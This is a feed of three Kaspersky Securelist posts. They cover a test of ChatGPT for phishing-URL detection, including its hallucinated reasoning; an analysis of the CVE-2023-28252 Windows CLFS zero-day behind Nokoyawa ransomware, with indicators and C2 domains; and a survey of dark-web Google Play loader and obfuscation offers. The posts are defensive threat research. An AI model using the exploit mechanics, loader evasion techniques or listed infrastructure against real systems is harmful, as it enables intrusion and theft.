  • Detection rate: 87.2%
  • False positive rate: 23.2%

While the detection rate is very high, the false positive rate is unacceptable. Imagine if every fifth website you visit was blocked? Sure, no machine learning technology on its own can have a zero false positive rate, but this number is too high. To put this in perspective, in a well-known paper called URLnet, where Le et al. solved a very similar task, the authors managed to achieve about the same level of detection rate (~85%) with a false positive rate of about 0.4% with a specially crafted convolutional neural network. A more recent URLTran paper by Maneriker et al. uses Transformers (the same architecture that powers ChatGPT) to achieve an even lower FPR.

ROC curve from Le et al., 2018, illustrating achievable TPR (DR)/FPR values

ROC curve from Le et al., 2018, illustrating achievable TPR (DR)/FPR values

Unfortunately, there are no miracles here. This is also where we met the first limitation – we can’t adjust the threshold to trade FPR for DR. Or can we?

The second experiment: ‘Is it safe?’

Our prompt was probably too specific and cued the language model to view the link with suspicion. Instead of asking if the link is phishing, we could ask if it is safe to visit, and maybe the LLM would behave less suspiciously. This led us to the second prompt:

{"role": "system", "content": "You are a helpful internet security assistant chatbot."},
        {
            "role": "user", 
            "content": 'Is this link safe to visit? '
            'Answer in the json format: {"safe": "yes|no", "yes_confidence": 0.5}'
            '\nwhere "yes_confidence" is the confidence that the link is safe from 0 to 1. '
            'Only output json.'
            '\nLink: ' + url
        },

Differences from the previous prompt:

  • Gone is the ‘cybersecurity guru’, who by nature should be suspicious of random links
  • We don’t ask for the target, so as not to alert the model that this is a phishing detection task
  • We do, however, ask for confidence. Though this is very unlikely, confidence may prove useful.

The results were quite discouraging:

  • Detection rate: 93.8%
  • False positive rate: 64.3%

It turns out that the more general prompt is more likely to prompt a verdict that the link is dangerous. This is how the links from the safe subset of data changed the assigned verdicts, compared to the previous cybersecurity guru prompt:

Internet security assistant chatbot verdicts (safe data) safe unsafe
CyberGPT cybersecurity guru verdicts (safe data)
safe 1049 1210
phish 2 682

Interestingly, the confidence choices are more like human-assigned confidence in the sense that round numbers like 90% occur most often:

TOP 5 probabilities that the model chose. Note that they are rounded to 0.1 (download)

At least the ROC curve looks alright, but there is no point at which this prompt would outperform the cybersecurity guru from the previous attempt:

ROC curve based on probabilities provided by ChatGPT

ROC curve based on probabilities provided by ChatGPT

To conclude, it is hard to predict the behavior of the LLM based on human reasoning about the prompt. Probably the “safety” of a link is a vaguer concept than “phish”. Understanding why the first prompt won by a large margin is difficult, and choosing the best prompt at this time, despite the emergence of new prompt engineering techniques, is more art than science.

Verdict stability

An important fact about LLMs is that the generation process is random. While you can coerce an LLM to be almost deterministic by setting its temperature parameter, which actually controls the output randomness, to 0 (there are still numerical sources of non-determinism), it usually leads to poor performance (such as the tendency to repeat the same phrase over and over again). As a result, for each token (a word or its part) that the network generates, it has a few alternatives among the choices (also controllable by parameters).

Non-deterministic verdicts are not the top feature you expect from a detection system. To measure its impact on the results, we conducted another small experiment in which we chose 200 random URLs (100 safe and 100 phish) and gathered verdicts with the same simplified prompt:

{"role": "system", "content": "You are a helpful internet security assistant chatbot."},
        {
            "role": "user", 
            "content": 'Is this link safe to visit? '
            'Answer in the json format: {"safe": "yes|no"}'
            '\nOnly output json.'
            '\nLink: ' + url
        },

This is how the results of these two identical runs compare (the responses are not post-processed and answer the question of whether the link is safe):

Run 2 no unknown yes
Run 1
no 145 2 3
yes 4 0 46

So, the verdict for 4.5% percent of the URLs changed due to the randomness of the LLM, with the variation in verdicts between runs on safe URLs being 7%. Again, while this can be remedied by tweaking the temperature, it’s an important factor to keep in mind when using LLMs.

Organization extraction

The most striking aspect of ChatGPT’s performance was the extraction of the potential phishing target. When attackers craft their samples, they try to trick users into believing that the URL is genuine and belongs to a company, while also obfuscating it enough to fool automated analysis. Extracting the attack target can be useful in many scenarios.

ChatGPT has enough real-world knowledge to know about many internet and financial services and with only a small post-processing step (e.g., merging “Apple” and “iCloud” or removing “LLC” and “Inc”) it does a very good job at extracting them. It was able to identify a target more than half the time. Note that not every URL contains a reference to a target organization. Among the identified companies, there were major tech portals like Facebook, TikTok and Google, marketplaces such as Amazon and Steam, lots of banks from all over the world, from Australia to Russia, cryptocurrency and delivery services.

Some interesting examples include:

URL: hxxps://steancxxxmuunity.com/profiles/765xxxxxxxxxx175

Organization: Steam

Reasoning: The domain name ‘steancxxxmuunity.com’ appears to be a typo-squatting attempt. The correct spelling of the domain should be ‘steamcommunity.com’. The website is trying to impersonate Steam Community, a popular gaming platform…

URL: https://cxxxxxxxxr.com/wp-includes/js/jcrop/cgi/BOfA/Validation/login.php?cmd=login_submit

Organization: Bank of America

Reasoning: The link is suspicious and indicates a phishing attempt because the domain name is not related to the possible targeted company (Bank of America), the URL is also suspicious containing additional characters such as ‘/wp-includes/js/jcrop/cgi’…

URL: http://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

Organization: Microsoft

Reasoning: The link’s domain name (caseld-10xx93.info) does not appear to be related to Microsoft’s Office 365 service. The URL path also contains a misspelled version of the word ‘office’ (0fflce) and a suspiciously old version number (3.6.5).

URL: http://adobexxxsignxxxx.duckdns.org/ees/

Organization: Adobe

Reasoning: The domain name ‘duckdns.org’ is a free dynamic DNS provider which is often used by cyber criminals for hosting phishing sites or other malicious content. Additionally, the subdomain adobexxxsignxxxx in the URL appears to imitate the legitimate Adobe service ‘Adobe Sign’, which suggests that the attackers may be targeting Adobe’s customers for information theft or fraud.

Here we see that ChatGPT detects homographic attacks (although it can confuse them with typo-squatting), and correctly states that the domains are not related to the companies. While it fails to untangle that “3.6.5” is an imitation of 365, the explanations are quite reasonable.

Implicit knowledge: reasoning analysis

The examples above are cherry-picked. When cherry-picking with the opposite intention, some funny things happen. The explanations that ChatGPT provides may include:

  • References to WHOIS, which the model doesn’t have access to:
    • Finally, if we perform a WHOIS lookup for the domain name, it was registered very recently (2020-10-14) and the registrant details are hidden.
  • References to content on a website that the model doesn’t have access to either:
    • the website is asking for user credentials on a non-Microsoft website. This is a common tactic for phishing attacks.
    • Additionally, the webpage’s layout and design are inconsistent with eBay’s official website, indicating that it may be a fake website designed to impersonate eBay.
    • There is also no information available on the website’s security and privacy policy. A secure website should provide that information transparently to users.
  • References to SSL certificate expiration:
    • The domain ‘duckdns.org’ is not owned by Netflix, and the SSL Certificate is invalid.
  • Misstatements:
    • The domain ‘sxxxxxxp.com’ is not associated with Netflix and the website uses ‘http’ protocol instead of ‘https’ (the website uses https)
  • Revelatory nuggets of cybersecurity information:
    • The domain name for the URL ‘yxxxx3.com’ appears to be registered in Korea which is a red-flag.

These are funny and highlight the limitations of an LLM: while it can generate reasonable explanations, it is also prone to hallucinations – such as imagining contexts that it does not have access to, or coming up with facts that are just plain wrong.

In general, however, we see that the model demonstrates a non-trivial understanding of the task. Analyzing all the explanations by hand would be laborious, so we do some distant reading here to get a bird’s-eye overview of the reasonings it generates by applying a little bit of old-school NLP.

First of all, we noticed that the model used mostly short, terse sentences with one point per sentence in its explanations. We split the statements into sentences using the NLTK Punkt tokenizer. The resulting sentences were then vectorized using MPNet from the Sentence-Bert package, and then visualized using UMAP. To color the resulting plot, we used DBSCAN clustering. A few iterations of hyperparameter tweaking yield the following result:

Cluster analysis of explanations provided by ChatGPT. Semantically close reasons form dense clusters.

Cluster analysis of explanations provided by ChatGPT. Semantically close reasons form dense clusters.

These dense clusters reveal the most popular phrases that the model provides as explanations. Some of these clusters are:

  • Mentions of particular target companies.
  • Recommendations not to click the link.
  • Certain statements about the website being phish or not.
  • Statements of uncertainty.
  • References to HTTPS (or lack thereof) or SSL (usually hallucinations)
  • Sentences like “This is a common tactic…”

However, some of them reveal “common tactics”:

  • Use of IPFS: “The URL looks suspicious and appears to be hosted on IPFS which can be used to host malicious content.”
  • Suspicious elements in path, including homographic attacks: “This link is an example of a homograph attack also known as ‘IDN homograph attack’.”
  • Elements in path or domain that are related to security and urgency: “Lastly, the URL has a sense of urgency to it, indicating that the user needs to click immediately.”
  • Use of dynamic DNS: “The domain name ‘duckdns.org’ is a free dynamic DNS provider that can be used by anyone to create custom subdomains, which makes it easy for attackers to use for phishing emails or websites impersonating legitimate companies”.
  • An email in the parameters: “Additionally, the email address used as a query parameter may indicate a potential phishing attempt.”
  • Mention of an organization in the path or subdomain while the domain is not related to the organization: “The link appears suspicious as it contains a subdomain that is not related to Amazon.”
  • Elements in the domain that look autogenerated: “Also, the path ‘bafyxxxxxxxxxxxxxxxxxx43ky’ suggests that this is an autogenerated link.”

These points make a lot of sense. This means that the training data for ChatGPT contained enough cybersecurity material for the LLM to learn the telltale signs of phishing attempts and use this knowledge to analyze specific cases, which is very impressive.

Conclusion

As we have seen, for a zero-shot system the results are amazing – it is hard to argue with, even for a die-hard sceptic. Anecdotal examples, especially the cherry-picked ones, are also very impressive. This is why, when we talk about real-world performance, a screenshot from Twitter is not a solid basis for decision-making. This is especially true in cybersecurity, where applying automated scenarios to our tasks means going far beyond “good” or even “impressive” performance.

As with many other use cases, the core detection task is only part of the problem. Creating signatures or blocklist records, validating and testing them, delivering them, ensuring quality of service is less glamorous, but just as important, and here we need a lot of hard work done by humans to get things rolling.

Moreover, the use of LLM means applying a whole new set of skills. We could have improved the results, both in detection, target organization extraction and reasoning, by trying various things:

  • Using a stronger model, such as GPT-4
  • Using special prompt-designing patterns, such as Chain-of-Thought-prompting or Reflect-Critique-Improve
  • Feeding parts of the HTML along with the URL
  • Adjusting the system prompt and sampling parameters, such as temperature, etc.

However, this means abandoning the hope of a zero-shot AI that “just works”. Also, using LLMs means dealing with their current idiosyncrasies, such as the demonstrated tendency to hallucinate (manifested by coming up with imaginary explanations and referring to page texts it has never seen), randomness of output, as well as possible prompt injection attacks.

On the other hand, if we look at the organization extraction and reasoning, we have to admit that it performs on par with what we would expect from an intern-level phishing analyst: it is good, but never leave it without supervision! Therefore, it is possible to use this type of technology to assist flesh-and-blood analysts by highlighting suspicious parts of the URL and suggesting possible attack targets. It could also be used in weak supervision pipelines to improve classic ML pipelines.

All in all, while impressive, ChatGPT and LLMs are not yet ready to radically change the cybersecurity game, at least as far as phishing detection is concerned. At Kaspersky, we continue to investigate cutting-edge technologies and study their potential impact on both cyberattackers and defenders. Let’s see what happens next.

]]>
https://securelist.com/chatgpt-anti-phishing/109590/feed/ 1 full large medium thumbnail
Nokoyawa ransomware attacks with Windows zero-day https://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/ https://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/#comments Tue, 11 Apr 2023 17:36:20 +0000 https://kasperskycontenthub.com/securelist/?p=109483

Updated April 20, 2023

In February 2023, Kaspersky technologies detected a number of attempts to execute similar elevation-of-privilege exploits on Microsoft Windows servers belonging to small and medium-sized businesses in the Middle East, in North America, and previously in Asia regions. These exploits were very similar to already known Common Log File System (CLFS) driver exploits that we analyzed previously, but we decided to double check and it was worth it – one of the exploits turned out to be a zero-day, supporting different versions and builds of Windows, including Windows 11. The exploit was highly obfuscated with more than 80% of the its code being “junk” elegantly compiled into the binary, but we quickly fully reverse-engineered it and reported our findings to Microsoft. Microsoft assigned CVE-2023-28252 to the Common Log File System elevation-of-privilege vulnerability, and a patch was released on April 11, 2023, as part of April Patch Tuesday.

While the majority of zero-days that we’ve discovered in the past were used by APTs, this particular zero-day was used by a sophisticated cybercrime group that carries out ransomware attacks. This group is notable for its use of a large number of similar but unique Common Log File System (CLFS) driver exploits that were likely developed by the same exploit author. Since at least June 2022, we’ve identified five different exploits used in attacks on retail & wholesale, energy, manufacturing, healthcare, software development and other industries. Using the CVE-2023-28252 zero-day, this group attempted to deploy the Nokoyawa ransomware as a final payload.
Nokoyawa ransom note

Nokoyawa ransom note

Elevation-of-privilege exploit

The attacker must be authenticated with user access and have the ability to run code on the target system to launch the elevation-of-privilege exploit.

CLFS is a log file subsystem that was first introduced in Microsoft Windows Server 2003 R2 / Microsoft Vista and is implemented in the clfs.sys driver. This file system can be used by any application and Microsoft provides an API for it. Logs are created using the CreateLogFile function – a log is made up of a base log file (.blf file name extension) that is a master file containing metadata, and a number of containers that hold the actual data. Containers are created using the AddLogContainer and AddLogContainerSet functions. As you may already guess, the base log files are the most interesting to look at. But while Microsoft provides an API for working with them, their file format is undocumented, and developers should interact with them only through the CLFS API. The file structure of base log files, when viewed briefly in a hex editor, does not seem very complicated, and Microsoft provides debug symbols for clfs.sys, so with a sufficient level of enthusiasm this format can be reverse engineered (already done by Alex Ionescu). A glance at the structure of base log files instantly raises a red flag – the file consists of kernel structures as it is, and there are even fields for storing memory pointers! Combine that with the fact that, according to the API documentation, this technology is quite complicated, plus it was developed a long time ago, and we have a large number of vulnerabilities as a result. Searching for “Windows Common Log File System Driver Elevation Of Privilege Vulnerability” shows that there have been at least thirty-two such vulnerabilities (not counting CVE-2023-28252) discovered since 2018, where three of them were detected in the wild as zero-days (CVE-2022-24521, CVE-2022-37969, CVE-2023-23376).

CVE-2023-28252 is an out-of-bounds write (increment) vulnerability that can be exploited when the system attempts to extend a metadata block. The vulnerability is triggered by manipulating a base log file. At this time, we will not share the names of the fields or exact values that should be written to the file in order to trigger the vulnerability, as that information could facilitate further exploitation. This is to ensure that everyone has enough time to patch their systems before other actors develop their own exploits for CVE-2023-28252. Instead, we will share some general information about the vulnerability and the way of exploiting it.

The vulnerability is triggered in the CClfsBaseFilePersisted::ExtendMetadataBlock function when this function is executed with a call to the AddLogContainer API function. There is a condition for CClfsBaseFilePersisted::ExtendMetadataBlock function to be executed, and the base log file needs to be modified for that to happen. Besides, various fields in the CONTROL and CONTROL_SHADOW metadata blocks need to be patched. The exploit modifies LogBlockHeader->ValidSectorCount and various fields in LogBlockHeader->Record[0] for both the CONTROL and CONTROL_SHADOW metadata blocks. As a result of these changes, the CClfsBaseFilePersisted::ExtendMetadataBlock function performs out-of-bounds access to the m_rgBlocks array, which contains only six elements. After that, the CClfsBaseFilePersisted::WriteMetadataBlock function will proceed to use the retrieved value from the m_rgBlocks array as a pointer to the _CLFS_LOG_BLOCK_HEADER structure to increment LogBlockHeader->Record[0]->DumpCount and LogBlockHeader->Usn. This can be used to corrupt a kernel object in the memory and obtain kernel read/write privileges if the address of the desired victim object is sprayed in the right location in the memory.

The discovered exploit uses the vulnerability to corrupt another specially crafted base log file object in a way that a fake element of the base log file gets treated as a real one. _CLFS_CONTAINER_CONTEXT is an example of the structure that gets stored in base log files, but contains a field for storing a kernel pointer. Of course, the value of this field is ignored when the structure is read from the base log file on disk, but changing in memory the offset pointing to the valid _CLFS_CONTAINER_CONTEXT structure into an offset pointing to a specially crafted malicious _CLFS_CONTAINER_CONTEXT structure makes it possible to provide a pointer to a controlled memory in a user level and obtain kernel read/write privileges with it.

The exploit leaks the addresses of kernel objects to achieve stable exploitation. This is done using the NtQuerySystemInformation function – a technique that we previously saw in other zero-days (e.g. PuzzleMaker, MysterySnail APT cases). The information classes used by the exploit require Medium IL to work.

We believe that CVE-2023-28252 could have been easily discovered with the help of fuzzing. But there are already so many vulnerabilities found in this component, so if it’s discoverable by fuzzing, why has it not been found before? We have a possible explanation. Examining the clfs.sys driver code in disassembler shows extensive use of try/catch blocks to catch exceptions. In many parts of the code when an exception occurs it gets masked by an exception handler and the code continues its normal execution like nothing happened. We verified that with CVE-2023-28252 a possible access violation that follows after triggering the vulnerability is masked by an exception handler. This makes us think that previously fuzzers were actually hitting this vulnerability, but because there was no crash it continued to be undiscovered. For effective fuzzing, it’s necessary to keep in mind the possibility of such a scenario and to take steps to prevent it.

Post exploitation and malware

We see that the main purpose of using elevation-of-privilege exploits was to dump the contents of the HKEY_LOCAL_MACHINE\SAM registry hive.

As for the malware, attackers use Cobalt Strike BEACON as their main tool. It’s launched with a variety of custom loaders aimed to prevent AV detection.

In some of the other attacks that we attribute to the same actor, we also observed that, prior to exploiting the CLFS elevation-of-privilege vulnerability, the victim’s machines were infected with a custom modular backdoor named “Pipemagic” that gets launched via an MSBuild script. At the end of last year, we published a private report about this malware for customers of the Kaspersky Intelligence Reporting service.

In attacks using the CVE-2023-28252 zero-day, this group attempted to deploy Nokoyawa ransomware as a final payload. Yearly variants of Nokoyawa were just “rebranded” variants of JSWorm ransomware, which we wrote about previously. In this attack, cybercriminals used a newer version of Nokoyawa that is quite distinct from the JSWorm codebase. It’s written in C and has encrypted strings. It was launched with an encrypted json config provided with a “–config” command line argument.

Decrypted and formatted config of Nokoyawa ransomware

Decrypted and formatted config of Nokoyawa ransomware

Conclusions

We see a significantly increasing level of sophistication among cybercriminal groups. We don’t often see APTs using zero-day exploits in their attacks, and now there are financially motivated cybercriminal groups that have the resources to acquire exploits for unknown vulnerabilities and routinely use them in attacks. Moreover, there are developers willing to help cybercriminal groups and to produce one exploit after another.

We detect the CVE-2023-28252 exploit and related malware with the verdicts:

  • PDM:Exploit.Win32.Generic
  • PDM:Trojan.Win32.Generic
  • HEUR:Trojan-Ransom.Win32.Generic
  • Win64.Agent*

Kaspersky products detected these attacks with the help of the Behavioral Detection Engine and the Exploit Prevention component. CVE-2023-28252 is the latest addition to the long list of zero-days discovered in the wild with the help of our technologies. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone.

More information about this and related attacks is available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports@kaspersky.com.

Kaspersky would like to thank Microsoft for their prompt analysis of the report and patches.

Indicators of compromise

After finishing, the exploit leaves files used for exploitation at the hard-coded path in the “C:\Users\Public\” folder. Companies can check if the exploit was launched on their servers or employees’ machines by looking for the presence of the “C:\Users\Public\.container*”, “C:\Users\Public\MyLog*.blf”, and “C:\Users\Public\p_*” files.

Exploitation artifacts
C:\Users\Public\.container*
C:\Users\Public\MyLog*.blf
C:\Users\Public\p_*

Exploit
46168ed7dbe33ffc4179974f8bf401aa

CobaltStrike loaders
1e4dd35b16ddc59c1ecf240c22b8a4c4
f23be19024fcc7c8f885dfa16634e6e7
a2313d7fdb2f8f5e5c1962e22b504a17

CobaltStrike C2s
vnssinc[.]com
qooqle[.]top
vsexec[.]com
devsetgroup[.]com

Nokoyawa ransomware
8800e6f1501f69a0a04ce709e9fa251c

]]>
https://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/feed/ 2 full large medium thumbnail
Overview of Google Play threats sold on the dark web https://securelist.com/google-play-threats-on-the-dark-web/109452/ https://securelist.com/google-play-threats-on-the-dark-web/109452/#comments Mon, 10 Apr 2023 08:00:02 +0000 https://kasperskycontenthub.com/securelist/?p=109452

In 2022, Kaspersky security solutions detected 1,661,743 malware or unwanted software installers, targeting mobile users. Although the most common way of distributing such installers is through third-party websites and dubious app stores, their authors every now and then manage to upload them to official stores, such as Google Play. These are usually policed vigorously, and apps are pre-moderated before being published; however, the authors of malicious and unwanted software employ a variety of tricks to bypass platform checks. For instance, they may upload a benign application, then update it with malicious or dubious code infecting both new users and those who have already installed the app. Malicious apps get removed from Google Play as soon as they are found, but sometimes after having been downloaded a number of times.

With many examples of malicious and unwanted apps on Google Play being discovered after complaints from users, we decided to take a look at what the supply and demand of such malware on the dark web looks like. It is especially important to analyze how this threat originates, because many cybercriminals work in teams, buying and selling Google Play accounts, malware, advertising services, and more. It’s a whole underground world with its own rules, market prices, and reputational institutions, an overview of which we present in this report.

Methodology

Using Kaspersky Digital Footprint Intelligence, we were able to collect examples of offers of Google Play threats for sale. Kaspersky Digital Footprint Intelligence allows discreet monitoring of pastebin sites and restricted underground online forums to discover compromised accounts and information leakages. The offers presented in this report were published between 2019 and 2023 and were collected from the nine most popular forums for the purchase and sale of goods and services related to malware and unwanted software.

Key findings

  • The price of a loader able to deliver a malicious or unwanted app to Google Play ranges between $2,000 and $20,000.
  • To keep their activities low-profile, a large percentage of attackers negotiate strictly through personal messages on forums and messengers, for example, in Telegram.
  • The most popular application categories to hide malware and unwanted software include cryptocurrency trackers, financial apps, QR-code scanners and even dating apps.
  • Cybercriminals accept three main kinds of payment: a percentage of the final profit, subscription or rent, and one-time payment.
  • Cybercriminals offer to launch Google ads to attract more people to download malicious and unwanted apps. The cost of ads depends on the target country. Ads for users from the USA and Australia cost the most — up to about $1 (US).

Types of malicious services offered on the dark web

As on legitimate online marketplaces, there are also various offers on the dark web for customers with different needs and budgets. In the screenshot below, you can see an offer list, which gives an overview of the number of different goods and services that may be needed to target Google Play users. The author of the list calls the prices too high; however, they do not contradict the prices we’ve seen in other dark web offers. The main products that attackers buy are developers’ Google Play accounts that can be either hacked or registered by cybercriminals using stolen identities, as well as source code of various tools that help the buyer to upload their creations to Google Play. Also, such services as VPS (for $300), or Virtual Private Server, which the attackers use to control infected phones or to redirect user traffic, as well as web-based injections are offered. A web injection is malicious functionality that monitors the victim’s activity, and if they open a web page that is of interest to the cybercriminals, an injector replaces it with a malicious one. Such a feature is offered for $25–80 apiece.

A dark web service provider calls these prices too high, and indicates that they sell the same services cheaper

A dark web service provider calls these prices too high, and indicates that they sell the same services cheaper

See translation

Here are the real product prices and how much money you need if you don’t choose me

  1. GP developer account ~ $60
  2. App source or expenses on merging a loader and an existing APK $4000 rent $20000 purchase
  3. VPS for the panel ~ $300
  4. VPS-proxy to redirect traffic ~ $100–300
  5. Domains ~ $5 per domain
  6. Loader development or rent ~ $2500–5000
  7. Bot development or rent ~ $1000–20,000
  8. Purchase or development of necessary web injections ~ $25–80 per injection. The more injections you have, the more you get from the installations
  9. Regular bot/loader cleanup (FUD) ~$300, encryption in online services ~$200
  10. Installations:
    • Traffic purchase for the GP loader
    • Installations purchase ~$1/installation; you can start with 300 installations to warm up the loader and assess their persistence => $300
    • Direct messaging
    • Email spam (forget about APK being undetectable)

Let’s take a look at some specific programs and services that cybercriminals offer for sale.

Google Play loaders

In most of the offers we analyzed, attackers sell Google Play loaders, programs whose purpose is to inject malicious or unwanted code into a Google Play app. This app is then updated on Google Play, and the victim may download the malicious update onto their phone. Depending on what exactly was injected into the app, the user may obtain the final payload with the update or get a notification prompting them to enable installation of unknown apps and install it from an external source. In the latter case, until the user agrees to install the additional app, the notification does not disappear. After installing the app, the user is asked for permissions to access key data from the phone, such as Accessibility Services, camera, microphone, etc. The victim may not be able to use the original legitimate app until they give the permissions required to perform malicious activities. Once all the requested permissions are granted, the user is finally able to use the app’s legitimate features, but at the same moment their devices become infected.

To convince the buyer to purchase their loaders, cybercriminals sometimes offer to provide a video demonstration, as well as to send a demo version to the potential client. Among the loader features, their authors may highlight the user-friendly UI design, convenient control panel, victim country filter, support for the latest Android versions, and more. Cybercriminals may also supplement the trojanized app with functionality for detecting a debugger or sandbox environment. If a suspicious environment is detected, the loader may stop its operations, or notify the cybercriminal that it has likely been discovered by security investigators.

Google Play loaders are the most popular offer on the dark web among Google Play threats

Google Play loaders are the most popular offer on the dark web among Google Play threats

Often loader authors specify the types of legitimate apps their loaders work with. Malware and unwanted software is frequently injected into cryptocurrency trackers, financial apps, QR-code scanners and even dating apps. Cybercriminals also highlight how many downloads the legitimate version of the target app has, which means how many potential victims can be infected by updating the app with malicious or unwanted code. Most frequently, sellers promise to inject code into an app with 5,000 downloads or more.

Cybercriminals sell a Google Play loader injecting code into a cryptocurrency tracker

Cybercriminals sell a Google Play loader injecting code into a cryptocurrency tracker

Binding service

Another frequent offer on the dark web is binding services. In essence, these do exactly the same thing that Google Play loaders do — hide a malicious or unwanted APK file in a legitimate application. However, unlike a loader, which adapts the injected code to pass the security checks on Google Play, a binding service inserts malicious code into an app that is not necessarily suitable for the official Android marketplace. Often, malicious and unwanted apps created with a binding service are distributed through phishing texts, dubious websites with cracked games and software, and more.

As binding services have a lower successful installation rate than loaders, the two differ greatly in price: a loader can cost about $5,000, while a binding service usually costs about $50–$100 per file.

Seller's description of a binding service

Seller’s description of a binding service

See translation

We present for your consideration an APK binding service.

What is APK binding for? In a nutshell, binding allows attackers to install a bot to gain more trust from the victim, who is loyal to the legitimate app that the Android bot is bound to.

In creating this binding service, our main goal was to create a universal binder that would allow binding an Android bot to any legitimate application.

The main condition for enabling binding is the possibility to decompile a legitimate app and then compile it back using apktool.

Our binder’s main ADVANTAGES:

  • Runtime/scantime FUD

    Runtime cleanness is achieved by encrypting the Android bot with our cryptor BEFORE binding. It is also clear of alerts from Google Protect and built-in antivirus on devices from different vendors.

  • Most recent Android version support

    The binder is compatible with Android 7 and higher

  • Dynamic bot launch

    What is it for? After a successful installation, the victim may tap Done instead of Open, and such installation is of no use. The binder dynamically launches the bot, no matter what the victim taps.

The binder’s main operating principle is that when the legitimate application is launched, it prompts the user to allow installation from unknown sources on a timer using social engineering, so that the bot can be installed. If the user rejects this, they receive another request after some time. Upon successful installation, the binder dynamically launches the bot.

This service is provided manually via jabber.

The advantages and features of binding services listed in sellers’ ads are often similar to those of loaders. Binders usually lack Google Play-related features, though.

Malware obfuscation

The purpose of malware obfuscation is to bypass security systems by complicating malicious code. In this case, the buyer pays either for processing a single application, or for a subscription, for example, once per month. The service provider may even offer discounts for the purchase of packages. For example, one of the sellers offers obfuscation of 50 files for $440, while the cost of processing only one file by the same provider is about $30.

Google Play threat obfuscation offer for $50 apiece

Google Play threat obfuscation offer for $50 apiece

See translation

Hi everyone,

We obfuscate your APK files, so Google Play Protect lets them pass (allowlist certificate).

[IMG link]

This is not our case.

We are now working in manual test mode, later the process will be fully automated.

We offer:

  • manifest morph (packagename, random activitis, class, etc)
  • text string morph on the Smali code level (encryption with random key with Base encoding)
  • resource name morph (optional)
  • manifest and code part obfuscation on the Smali code level
  • complicated trash Smali opcode generation (optional)
  • trusted certificate accepted by Google Play Protect

Output:

  • antivirus check scan to monitor possible false positives
  • encrypted APK

Price:

1 file – $50

Service plans will be available when the site and API are ready

Payment accepted in BTC only

Contacts:

  • email
  • PM

Restrictions:

  • APK max size – 5MB
  • Important! Uploading files obfuscated by our service to VirusTotal is prohibited (checking via hash).
  • Important! The service doesn’t support apps that can damage CIS users (strings are automatically checked against a denylist)
  • Important! The service has the right to refuse app obfuscation without any explanation
  • Important! The service has the right to review the prices in the future

Installations

To increase the number of downloads of a malicious app, many attackers offer to purchase installations by increasing app traffic through Google ads. Unlike other dark web offers, this service is completely legitimate and is used to attract as many downloads of the application as possible, no matter if it is a still-legitimate application or an already poisoned one. Installation costs depend on the targeted country. The average price is $0.5, with offers ranging from $0.1 to $1. In the screenshot below, ads for users from the USA and Australia cost the most — $0.8.

Seller specifies the installation price for each country

Seller specifies the installation price for each country

See translation

Increase installations of your Android app from Play Market through Google Ads (UAC).

Other services

Dark web sellers also offer to publish the malicious or unwanted app for the buyer. In this case, the buyer does not interact directly with Google Play, but can remotely receive the fruits of the app’s activity, for example, all victim data stolen by it.

Average prices and common rules of sale

Kaspersky experts analyzed the prices in dark web ads offering Google Play-related services, and found that fraudsters accept different payment methods. The services can be provided for a share of the final profit, rented, or sold for a one-time price. Some sellers also hold auctions of their goods: since the number of items sold is limited, they are not very likely to be discovered, so buyers may be willing to compete for them. For example, in one of the auctions we found, the bidding for a Google Play loader started at $1,500, the bid increment (step) was equal to $200, and the “blitz” — the instant purchase price — was $7,000.

Cybercriminals auction a Google Play loader

Cybercriminals auction a Google Play loader

See translation

Google Play Loader source, ver №2

The loader uses minimum rights, doesn’t require special rights that need permission to be granted, the traffic between the loader and the server is AES-128 encrypted with an encryption key generated once after registration, and a dynamically used initialization vector (IV). Contacts admin panel every 10 seconds. Searches for APK to install every 60 seconds. If an APK is already installed, the loader starts it one time. The loader doesn’t bother users, but subtly asks to install the app. Stable launch after reboot. Adapted for uploading to Google Play. Evasion methods for functionality restrictions on the device are implemented. Offline when the screen is off (loader doesn’t need to stay online). Anti-emulator and Google geo IP check. Blocked in CIS. Convenient admin panel.

The reason for selling I mentioned in the source sale topic.

Variant 2

The payload is a module (dex) file, AES-128 encrypted, injected into the legit app resources. It is loaded when the app is launched (loading into memory, decryption and dumping into the app’s internal storage). Not for Google Play, blocks 80% of apps with Class Dex Loader.

Start: $1,500

Step: $200

Blitz: $7k

The bidding ends in 12 hours after the last bid.

You are welcome to use an escrow service

The offered blitz price is not the highest. Prices for loaders we observed on dark web forums range between $2,000 and $20,000, depending on the malware complexity, novelty and prevalence, as well as the additional functions. The average price for a loader is $6,975.

Example of average offer for a Google Play loader

Example of average offer for a Google Play loader

However, if cybercriminals want to buy the loader source code, the price immediately rockets, reaching the upper limit of the price range.

Seller offers a Google Play loader source code for $20,000

Seller offers a Google Play loader source code for $20,000

As opposed to a loader, a Google Play developer account (either hacked or newly created by the cybercriminals) can be bought quite cheaply, for example, for $200, and sometimes even for as little as $60. The price depends on the account features, such as the number of already published apps, number of their downloads, etc.

User wants to buy a Google Play account with access to the developer's email

User wants to buy a Google Play account with access to the developer’s email

In addition to the many offers for sale, we also found numerous messages on the dark web about wanting to buy a particular product or service for a certain price.

Cybercriminal looking for a new Google Play loader

Cybercriminal looking for a new Google Play loader

User wants to buy a new loader because their developer went on a binge

User wants to buy a new loader because their developer “went on a binge”

See translation

Need a loader

Enough experience, current coder went on a binge, and we’re in search of an alternative

We know prices and the market, won’t rob you, from $7k to your price

DM your offers

Deposit on our side or with an escrow service

How deals are made

Sellers on the dark web offer whole packages of different tools and services. To keep their activities low-profile, a large percentage of attackers negotiate strictly through private messages on dark web forums or personal messages on social networks and in messengers, for example in Telegram.

It may seem that service providers could easily deceive buyers, and make a profit from their apps themselves. Often this is the case. However, it is also common among dark web sellers to maintain their reputation, promise guarantees, or accept payment after the terms of the agreement have been fulfilled. To reduce risks when making deals, cybercriminals often resort to the services of disinterested intermediaries — escrow services or middlemen. An escrow may be a special service and supported by a shadow platform, or a third party disinterested in the results of the transaction. Note, however, that on the dark web nothing eliminates the risk of being scammed with 100% probability.

Conclusion and recommendations

We continuously monitor the mobile threat landscape to keep our users safe and informed of the most important developments. Not long ago, we published a report about the threats smartphone users faced in 2022. However, looking at the volume of supply and demand of such threats on the dark web, we can assume that the number of threats in the future will only grow — and become more complex and advanced.

To stay protected from mobile threats:

